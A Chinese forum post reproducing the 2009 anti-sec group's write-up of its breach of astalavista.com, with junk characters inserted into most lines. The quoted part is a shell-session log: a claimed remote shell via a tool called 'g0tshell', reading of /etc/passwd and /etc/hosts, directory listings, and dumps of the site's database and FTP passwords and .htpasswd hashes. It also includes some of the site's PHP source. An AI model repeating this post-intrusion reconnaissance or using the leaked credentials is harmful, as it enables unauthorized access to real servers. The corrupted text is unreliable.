里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。& U6 p S4 y9 h& F8 I
( L% P' e0 ~, ?7 o) p. l5 b
[root@front3 ~]# curl -I litespeedtech.com" |" F" D, I. [( r) A4 n1 G; N
HTTP/1.1 200 OK0 i5 l3 s, q0 O
Date: Fri, 05 Jun 2009 22:54:51 GMT+ S# w6 O) _7 t
Server: LiteSpeed ~. ?3 C" E' k% l! P* W; O: }
% _3 m( C8 [& w0 a) N( S
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
; \: ^4 A& I$ p- G8 v8 @; }2 d
: D" _+ W4 ?( o$ d0 s有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。: p, s& f2 z9 v; b
9 L B s: n P, H7 U" S
4 o( l6 Z3 Z" h/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
) U. ` w8 |5 C+ m9 s7 v0 g/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
8 R+ U0 n, v0 I( K; l) O( v/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
+ x) f5 ?7 K I# C3 ~\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /' W7 s# ~) C: I
\/ \/ \/ \/ \/ \/ \/9 j- b6 U% L8 D- W- W* B
The Hacking & Security Community
: L- ^% Q! a) C[+] Founded in 1997 by a hacker computer enthusiast1 }& h9 E7 \! P- d
[-] Exposed in 2009 by anti-sec group
0 x) A+ i( @% O% k1 u! C' i: j" v2 e% a) N& s: ]: A
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:3 W6 ~* q/ a, t: G
>> 03. Who’s behind the site?- ?) B# s- |6 X- y- L" t6 R( j5 z
>>
9 F! B6 s* Q" m. t. ?5 F5 c. D>> A team of security and IT professionals, and a countless number of contributors from all over the world. }" B$ ]$ }( Z( b
) _& F. U7 f' h& ^1 ~>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
7 I" P8 U0 Z$ m5 j* Z) {8 ?>>
7 ?1 M3 g0 g; s9 x>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and! X, b& O: P! y8 U* A. S
military institutions., Q0 m- J% e7 z W- c. [# Z
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.# o4 g/ E* F9 B( ?6 v
$ k+ H+ m7 \' [+ Y7 UWhy has Astalavista been targeted?
: e0 o4 q; C( {: L8 z4 G" }; h0 l# O, c$ G/ V
Other than the fact that they are not doing any of this for the “community” but- {) v8 v2 A6 e) m5 |# X& ?5 s
for the money, they spread exploits for kids, claim to be a security community8 T1 [. |+ h7 h' ~ P, h
(with no real sense of security on their own servers), and they charge you $6.669 N6 \6 e2 i+ I8 c& L& c
per months to access a dead forum with a directory filled with public releases
& _: u7 A/ t1 L. S' d& m, q2 z7 rand outdated / broken services.% e; P3 q! R( H9 j( E: K
" D# }" r' }7 pWe wanted to see how good that “team of security and IT professionals” really is.
- l; j' X& V A5 T: p, V
1 ~7 K2 `# r0 E! v; vLet’s begin.# T& f1 a$ Q# m4 t7 ^2 R5 a
; ^3 O* B( m5 j& n. @$ @anti-sec:~# ./g0tshell astalavista.com -p 80
! v# d9 A9 V% x8 J[+] Connecting to astalavista.com:80
7 U4 @8 [- ~) l) L* Y9 k$ J2 u$ L9 }[+] Grabbing banner…4 g: s+ ?# w* ] x$ Y+ R8 ~1 @
LiteSpeed
+ D% V S+ b6 R M6 ?+ E[+] Injecting shellcode…4 t" g6 j( z: u7 |, s$ h
[-] Wait for it
; C/ n4 O/ n- g
1 W. r( |3 A0 ^2 O% u[~] We g0tshell
$ x0 B9 g4 \; P* p# K( R, luname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
6 F" l l9 ?( q0 j T# z$ EID: uid=100(apache) gid=500(apache) groups=500(apache)
/ d, s0 l% l, M1 Z7 V3 x1 C u) }* Q' |/ f) A2 }6 R& | b) N
sh-3.2$ cat /etc/passwd
: x0 E( N v% ?" s: ]) X# a$ Oroot:x:0:0:root:/root:/bin/bash
$ `6 j6 U7 J+ s9 i: Bbin:x:1:1:bin:/bin:/sbin/nologin( L6 j4 r. O9 a2 W# e
daemon:x:2:2:daemon:/sbin:/sbin/nologin( o% ^8 p- ?# _# P
adm:x:3:4:adm:/var/adm:/sbin/nologin" d/ e, l- Z% P m' D4 k0 @
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
) s3 o0 u" c2 v0 msync:x:5:0:sync:/sbin:/bin/sync6 o- M9 }0 ~8 r, |, P; U6 L7 u
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown' ~7 E8 a% I7 @# }2 E+ ~
halt:x:7:0:halt:/sbin:/sbin/halt
Z2 u, K; y b- y, d9 cmail:x:8:12:mail:/var/spool/mail:/sbin/nologin7 p) E$ g6 y3 K5 A+ d
news:x:9:13:news:/etc/news:
) G% P2 j) B7 M4 Juucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
1 b# g0 v- e+ Y0 ?, }operator:x:11:0 perator:/root:/sbin/nologin+ u5 y; X$ y- R; s& b
games:x:12:100:games:/usr/games:/sbin/nologin- `7 F2 \4 r$ K, x, b( S e+ o
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
: M% s% x% F; a Y" aftp:x:14:50:FTP User:/var/ftp:/sbin/nologin7 u" a; x Y0 D
nobody:x:99:99:Nobody:/:/sbin/nologin
# R! m1 O. F; a0 ?# V9 y; z7 `% \4 x3 Prpm:x:37:37::/var/lib/rpm:/sbin/nologin
& [$ x6 w& v% j1 `- D S3 R1 ]dbus:x:81:81:System message bus:/:/sbin/nologin
2 L" i' \) S0 r# |nscd:x:28:28:NSCD Daemon:/:/sbin/nologin- @1 T9 p4 z! P
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin4 k& B% |5 J) S' ~* D% z
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
. m0 n( i6 Q( Y& M, }; M3 \vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin5 \/ Z, r- C8 |7 Z5 A
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
0 [6 u$ Q: k f% {/ Nrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
4 [3 J/ J$ w/ Q0 grpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin/ B! A& T( M' S! ^' q
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin; H1 [1 k N/ D- _% s' y; y
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin# k* r; b& N. o1 X& e
pcap:x:77:77::/var/arpwatch:/sbin/nologin
8 R: `( u- M8 l8 e+ Unamed:x:25:25:Named:/var/named:/sbin/nologin
3 C# U7 k. Y0 m: x* P$ ?: f: j+ wapache:x:100:500::/var/www:/bin/false4 g: n& ?8 f) r4 S- e9 `% @ ^
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
8 K1 e# U1 @5 wmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash% S% Q: P$ v' C
webapps:x:500:501::/var/www/html:/bin/bash
# b$ Q1 E3 D- x$ O$ Umajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
$ ?' p/ X& @* h8 C7 C$ gadmin:x:501:502::/home/admin:/bin/bash
4 J, c5 `2 P5 j, B2 y2 |jon:x:502:503::/home/jon:/bin/bash
' i8 S$ h" w1 ]- A. \0 Zcom:x:503:504::/home/com:/bin/bash( E S4 c, Y" x. `) q1 o) a+ U
ntp:x:38:38::/etc/ntp:/sbin/nologin
# A( J; J4 z0 T4 K F6 wais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
$ J; b% r* h( G+ m4 a9 s4 }astanet:x:504:505::/home/astanet:/bin/bash
( R+ w2 y' F" I, B ~4 Vavahi:x:70:70:Avahi daemon:/:/sbin/nologin* N$ P- D8 w- ~% w- {; q
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+ E! h* A/ G1 h! G: H7 `" Q& P8 L; A* y6 g$ u& S
sh-3.2$ cat /etc/hosts
; _7 V- O( {" T+ o# Do not remove the following line, or various programs6 M" k" B9 ]) L% r1 @
# that require network functionality will fail." x' w8 q3 m8 H8 n
127.0.0.1 localhost.localdomain localhost
1 Q7 d% Q& ]. { t9 W- U% ?; M k::1 localhost6.localdomain6 localhost6
; a' p8 a. Z! [: ^* {80.74.154.172 asta1.astalavistaserver.com5 L( F; F! c+ x3 `! d0 f. j
. Z* U. J0 k8 ]( d% X% O: Y
sh-3.2$ pwd
! i/ u7 b0 q2 b' V7 M( R* b6 n/home/com/public_html1 m& O; O' v* \0 k+ C! ~
% q/ a$ @' m2 N7 }) X4 hsh-3.2$ ls -la, u6 w+ m k* k6 ~, `7 t
total 18460% V( [; j* M- b* C; |
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
4 F( b; [0 F, O, K; pdrwx–x–x 11 com com 4096 Jun 25 2008 ..
* X" ]5 p: b& ]# B6 o# idrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin9 \6 f, w" n# t
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
+ V( f4 T$ O8 @. ldrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin: p; w4 E3 c. |' d- z2 k
drwxrwxrwx 2 com com 4096 May 19 00:50 config/ t6 K* q: Q ~" F* L
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
c6 C# {- a& @ ]" q N$ ~drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
$ G" n" U, Q; _drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing" ~7 ~$ I* n) w7 I/ R \
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo4 \0 g1 e5 d+ V2 [% }. V
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__4 h. Y: ]! |4 |- h9 U
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php: }! n+ n( Z: Y% T& I; U
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
4 q2 d x; m8 y$ ndrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor& [1 u Y" O; R, |- \
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico$ }! V8 b- G! c
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
5 L; g/ x/ s+ j, m! M-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
8 ?/ f* o( `8 x: c6 L3 o/ g, @3 z-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak1 C# e4 G7 E! `4 O1 g2 m/ V+ v
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak+ w3 i& O- V5 D$ U- D7 R
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool7 ^1 {( @! l2 J6 j4 k _7 L1 `
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images, v' S! V! k8 A* M4 t8 x2 p
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php, `* K7 ]- t O+ N; o( |! p ^
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer( \. s S; d1 @
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang; }) ~# @% y4 P6 k/ R
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
6 i5 B, D0 H# p! Q9 m' V. A% _8 v& Kdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
" M+ C% b/ K2 t4 a9 r/ cdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications6 g$ E- M5 Y* X P: O, l) Z
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
8 x6 N! l# G5 K/ r8 M8 zdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin8 ?: j6 a+ y: _
drwxrwxr-x 22 com com 4096 May 28 17:06 _new4 ]: l1 U) v8 s4 [! P9 y" [1 V
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
6 H- X0 s% M1 Pdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
y3 Z/ o4 c5 O: L: f, b1 vdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy6 `: H' L' F3 O
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt) f1 i+ m3 I2 g) p5 G- u( @. d
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
` a3 n, d; k1 |-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
+ ^3 G+ S! K" x8 |; ddrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes- o1 c8 u7 h% H" a% G4 v2 B
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp! A9 i3 F, ?1 [$ T; [$ |
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam% }) u- D6 I' }
* Q1 {6 D3 P( \" y- Ish-3.2$ head -20 index.php- {3 |9 c7 o/ m9 [0 x# r
<?php
$ @( l. b9 L0 c" P& d7 o7 ~% O4 X8 q/ W! w, U9 ?& i: J: g9 m
/**1 `! p3 W. K0 q8 l' M" z
* The main page for the CMS
" b* l; y& m5 ]9 z2 M9 F* @copyright CONTREXX CMS - COMVATION AG
* K0 N) R+ F, w2 c- S M* @author Comvation Development Team
6 o1 s) i" R* ?$ e* @version v1.0.9.10.1 stable
/ B% {( V6 K1 ~* @package contrexx3 W* e$ Q! P1 a0 F. n
* @subpackage core
0 e' t( L5 f* }1 o( p* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage5 U8 r) J& ^) f2 u7 j+ D* A
* @since v0.0.0.0; |+ w) e* I6 |8 @$ t+ Z6 b
* @todo Capitalize all class names in project
8 c/ I5 k1 N5 A0 D/ m6 J* @uses /config/configuration.php
% L' O2 j& t0 M" F8 H: y* @uses /config/settings.php
: K/ n. D' o0 n6 R* @uses /config/version.php
. Y9 ?3 f4 x) t9 A8 x3 S* @uses /core/API.php4 m5 ^" Q/ n! Z; C! G5 y! ?) L. W0 Z
* @uses /core_modules/cache/index.class.php
# q+ K) U1 h- r( s1 D* @uses /core/error.class.php. q" k0 w+ A/ i, ~
* @uses /core_modules/banner/index.class.php7 y' Z' I# W1 ~0 W2 V: K8 }
* @uses /core_modules/contact/index.class.php0 V# h9 g7 B# ~$ B2 ~; g* U
( i8 l4 ^. w1 u1 N% N3 R6 Ish-3.2$ cd config/
- y; `% T1 d9 {sh-3.2$ ls -la
3 X) L) [" |/ E# @total 32. C6 u& S1 ^2 F+ f* G* g' m
drwxrwxrwx 2 com com 4096 May 19 00:50 .% D7 i4 I* y7 n
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
0 Z8 Q/ P8 v8 N+ L-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
$ k3 K2 d' r* F-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
; U( U+ _ O7 b- S3 Q& a2 z-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
7 [* T5 w: C* y3 Z. r-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
9 S8 d. t% U1 u& f7 f. A$ }, _1 a( j
sh-3.2$ cat configuration.php
9 y3 F( u, G. W6 `[snip]
# n V$ }/ j% o" N$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
7 |' t9 I l7 d+ b. i7 ~$ ^$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name% X$ d+ |+ A, v& j0 m7 x7 i, q& Q
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix9 N3 c1 d" R( C$ X# ^" _
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
: w1 ~8 A5 `* K: S$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
) K" d0 a( c# Q6 A/ n$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)! G; k w2 m0 h% r/ S! g/ I- N
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)/ z3 J. ?# D: d. G
[snip]
- g7 U6 L. Y- E# \$_FTPCONFIG['is_activated'] = true; // Ftp support true or false3 ?. p. |* S- `7 P1 Q+ j( b
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode: e8 A6 r9 @/ K0 b- `
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
6 h- ?) N1 |- w% C' I8 K1 ]$_FTPCONFIG['port'] = 21; // Ftp remote port4 r; o H& t7 Q, Q' {; P
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username- ^/ Y& H D; i5 \
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
* h) b9 j% R' B$ W; g a8 p/ ^$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
" T' p+ {! m2 e2 J s5 s, @
1 N6 s5 M/ r& v5 B" o6 q: }, Xsh-3.2$ cd .. |2 }8 q/ v2 I7 i- d/ I
sh-3.2$ cd dvd/
! q# O$ Z6 w6 k& I3 ?# t1 psh-3.2$ ls -la
! `+ `5 y7 _: [" h; `3 ztotal 2913780& P: H8 J) u2 O$ l2 Q4 m
drwxr-xr-x 2 com com 4096 Sep 9 2008 .+ ?- j2 i) ^# g9 V
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..% u. x8 f% O4 k' V: X) \/ j
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
# B# \+ ?5 b) \8 q4 ~+ B9 I' U-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
8 [4 ]# r+ y* B7 r) [-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar# D5 f3 G4 l6 R: Z5 a( A" C2 `8 B
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess5 z3 z& I4 L0 B1 k. g2 P
% w# u5 x# q# Y" w* M. `. F/ E9 |sh-3.2$ cat .htaccess
$ c2 Y& Q( o, B# G" H3 P4 D; `authType Basic
2 N! `7 L# B @: i5 O, n' DauthName DVD
6 x& X& i, ]$ w+ z! ]authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd0 S# L, h6 ^/ b
require valid-user, E/ S7 [. T% d1 G+ }
" h7 b& P+ ^/ H! ]: `/ K w& Dsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd6 J# t- T$ H: j. @2 Q1 u
DVDdownload:CRD8cuY6.MPT6" V9 f/ E- m$ `5 o5 H( A" \
DVDdownload2:CR8a36.wluFMg2 F- P. v0 w' P0 C6 v
; \! j* Z) n: ush-3.2$ cat test.php
# q5 _# C1 Z6 N1 x! T5 R, e<?php
+ w) H8 D5 G& Z" r$ m7 Z* S2 l$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;3 U4 t8 K5 I6 z( @+ g" G+ l
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
* I1 b4 B3 n) e& w. W! ^9 {! ~echo $url;
8 ~; {- K% p" K! s1 f _?>3 [1 Q$ j/ Y% o( `6 U: {1 U0 D
; Y0 F; ~4 A7 X+ T* z8 ysh-3.2$ cd modifications/
# g' W5 c& G1 ]" a2 ish-3.2$ ls -la( b, h$ g* c/ o: B
total 32
' F N9 ?' L% \: Y) z# cdrwxr-xr-x 8 com com 4096 May 11 12:48 .% n- [# X- G( `- }' }: r/ j
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
; s6 ^: A4 G: h+ hdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
( B! ~ c3 Y+ O5 J- G* A3 adrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs* _- F) y9 g6 C* E% [% {6 |9 O+ [
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
! K, c n8 U" y1 k/ l0 A3 t& wdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc6 {3 R2 Y2 ^6 B, |7 r' w( |
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search% |) R0 J0 q4 [
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp* m4 E! g5 j% C
/ s' c: a8 ~2 z/ P2 J* Z9 [
sh-3.2$ ls -R( v& R: p& o2 P
.:* c9 R; _, ?5 j5 y
com_avtng cronjobs onlinetools pjirc search _tmp; F3 |: t" p; P8 Z2 Y
8 ]9 l) c) e3 X) P! \( N$ m% O./com_avtng:/ a( Q: S Q: }& Q; B) J
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
) R" e6 ~ A% T$ x5 f
$ u; D2 ]" k7 L8 t4 I$ C6 [9 h9 F./com_avtng/scripts:9 W2 m! x$ h) O2 q) P3 S: {. V
popunder.js
- O" |- e! z, J$ x, g$ P ^
) f0 p6 g0 d; x* t, h./cronjobs:
/ f2 g" i1 L0 E/ V$ g- f" a6 R: ]% p# Rexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
3 K, u3 |/ I0 y+ y/ b' J+ [8 E
- Z; U2 _9 W2 H5 K. {8 {: }; T./cronjobs/tmp:
$ `, {4 U1 ~0 n! R kcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv. M: v( h1 X" @/ p- Q& g8 [
p5 L. i1 R2 G" c6 c
./onlinetools:
# G* c8 f8 E) ^) H/ c+ Tindex.php$ t+ |! v h+ H& `+ _8 \6 K' F
# B1 G: @5 s, P
./pjirc: ^ z0 j5 l, k' m3 O; o
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt* x: I5 a$ Z6 f8 y) B8 s1 ~% J
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
4 D! y- |' ^- Pbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
# @& f I/ F( q( |7 A) Y
" K" D# {2 F5 A4 e3 _; O* e7 b./pjirc/img:: X7 ^; u# M0 J6 C8 P5 O
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif! ^: d% h7 b: L- D) X" f. F
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 1 D& w, i9 g& a V3 m
verre-eau.gif. Z$ g) `+ D1 g/ Y7 m
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
$ V, T5 N1 a( Y8 c4 ^8 w+ uverre-vin.gif" D$ t8 D, O" T* n0 h% Q# @
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
2 r; X+ ]* Q5 x* u# lbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
, H2 O; Z6 C2 H' l3 L7 S% I6 @( D8 a+ P* F
./pjirc/snd:+ _) y" t U: G
bell2.au ding.au
! g$ c5 P. | @9 N1 b- q1 Q% p0 ^! o) u, R
./search:: N# ^4 I* c% s, U9 v) `8 R
searchEngines.php search.php( c0 j5 x, a3 |
4 Q9 `" v# _7 s' ]% c0 n
./_tmp:7 \ H0 o- P* Y+ J. \6 U- Y
defaultPorts.php defaultPorts.txt1 {8 E, A. D) M5 R- N3 ^' L
4 {; F8 O: ^+ w& ]( c' ?; F
sh-3.2$ cd cronjobs/9 y" Z" n7 | y' @8 k7 M2 q
sh-3.2$ cat exploits.php7 I- w1 K$ V& j( a, j
[snip]
3 m7 h' W# g9 X9 V1 y; w$categories = array();/ J2 I$ h! o4 P1 b' f5 f5 S( Q
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;4 N/ m1 D4 s5 {3 p$ @' H: A' F
$expolits = file($milw0rmFile);
. R2 {9 S: N8 F2 r3 y$comExploits = array();( D6 \% P c3 P( z/ w$ N
[snip]0 q6 b6 E7 V$ o( B" [! Q
// manage data
! C; s/ _$ s9 ^' G* ffor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640, u" j+ T; N9 R7 S, b! j' B' R
, p# [, L/ l4 q+ j6 } // get path and title
v* i7 n# [& w* V1 |# v6 M $expolits[$x] = trim($expolits[$x]);1 c' [$ L+ `9 X( ]
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
6 m6 ^* g( s& a7 y# {, s2 _ $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);8 g7 U4 s8 `. H/ M) I# R, W
& C" B# B' X2 x1 o0 K; \9 v R/ z // check if file exists
8 O1 O" y0 F* b9 |9 J) i' V if (file_exists($path)) {: {! o1 G6 w1 S8 }& E3 r8 c& S7 g
- h J/ _. v+ [* {/ T" |: a& ~
$text = file_get_contents($path);
* H* \& X g% S0 v, }* |, N1 F
2 x' E+ v( x# X. [ F: G+ `6 _5 y // get content and date
( r/ I* z* j/ Z! ~2 d2 [/ R //$text = htmlspecialchars($text, ENT_QUOTES);
( \4 ?. A7 ^+ P0 R $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
3 r$ V) o% m8 n6 n/ b4 ^' p6 L: ^# H. R if ($tmptext != ”) {" o7 [" D4 ~9 j: y4 \
$text = $tmptext;; h9 y5 i l* j
} else {3 M5 Q& K2 P/ n' {
$text = addslashes(htmlentities($text, ENT_QUOTES));
0 e' {3 f6 p) J0 a) ]$ W M1 C" M5 m }2 M1 ~$ b( I3 N9 l/ l
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));% U% x, c& Z+ p% D& a+ Q" b0 z- X: x' f
$tmp = explode('-', $date);, O* p% E# J* o
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));: l9 N# ?$ \7 {, c, n) J2 E/ Y! G
$cat = getCategory ($path);
, o ` [( ? q2 M6 U( ^ $ext = pathinfo(basename($path));
- r$ R, e9 i- o4 G( c* K" z5 f; r3 I $ext = $ext['extension'];2 B+ k8 i. Y0 [/ |, o/ I
$qStr = ”
+ U5 A+ t( M7 e% t SELECT `id`
. R" F, q+ R) G9 l0 B5 @% ~5 B d, p FROM `contrexx_module_exploits`
' t: l: G; Z3 K4 L WHERE `title` = ‘” . $title . “‘
5 H* u! n5 p' {# M* ^ AND `date` = ‘” . $date . “‘
; E$ W. U7 ]# l2 c “;6 L6 e* B5 }: I5 E* K: m2 @( w
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
) M1 |$ |- Z7 t" E/ |# D. M $q = $_objDB->query($qStr);+ ]3 Q; `8 M. y
- B0 B, Y0 F/ e. r" m if ($q->numRows() == 0) {
4 D9 a0 ]* X |' y/ L
0 B8 U0 O8 ?, C1 L( R' e // prepare array
8 N& n# y; `+ v $comExploits[$x]['date'] = $date;4 Y! q8 r+ C* h) k; _
$comExploits[$x]['title'] = $title;' ?2 s2 e( m7 ?1 O! Y0 e
$comExploits[$x]['author'] = ‘milw0rm’;
, H4 l- ?- o d2 b( ^ $comExploits[$x]['text'] = $text;% W1 ^: D0 v- o+ `$ s
$comExploits[$x]['source'] = $ext;0 z% X3 a, O$ K5 \8 D! |
$comExploits[$x]['url1'] = ”;& V- O2 @' J; ^0 W
$comExploits[$x]['url2'] = ”;
- f8 t: _$ k! u7 f5 M $comExploits[$x]['catid'] = $cat;
- { ]4 I' [. M4 Z' U $comExploits[$x]['lang'] = ‘2′;# r* }% j" F+ f
$comExploits[$x]['userid'] = ‘12′;
4 [8 T# p1 e, k. x1 X $comExploits[$x]['startdate'] = ‘0000-00-00′;
- J, H" R8 Y" C. G6 J+ d' d $comExploits[$x]['enddate'] = ‘0000-00-00′;+ W. v" i+ ^! M, T! `
$comExploits[$x]['status'] = ‘1′;
% ?4 @ F p2 D: O- Y $comExploits[$x]['changelog'] = $date; _7 U) U; h( p+ t, d
. x! n/ S" T1 Q0 Z, w- T }
4 L5 M4 E# ` J2 B[snip]
7 w0 A# u/ h9 \' @& L+ A $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
) h0 C0 G- Z7 s5 t<rss version=”2.0″>
' j& ^% b6 {6 b) j- q <channel>
- ^ D, ^$ a& [: f2 G <title>ASTALAVISTA.com - Exploits</title>
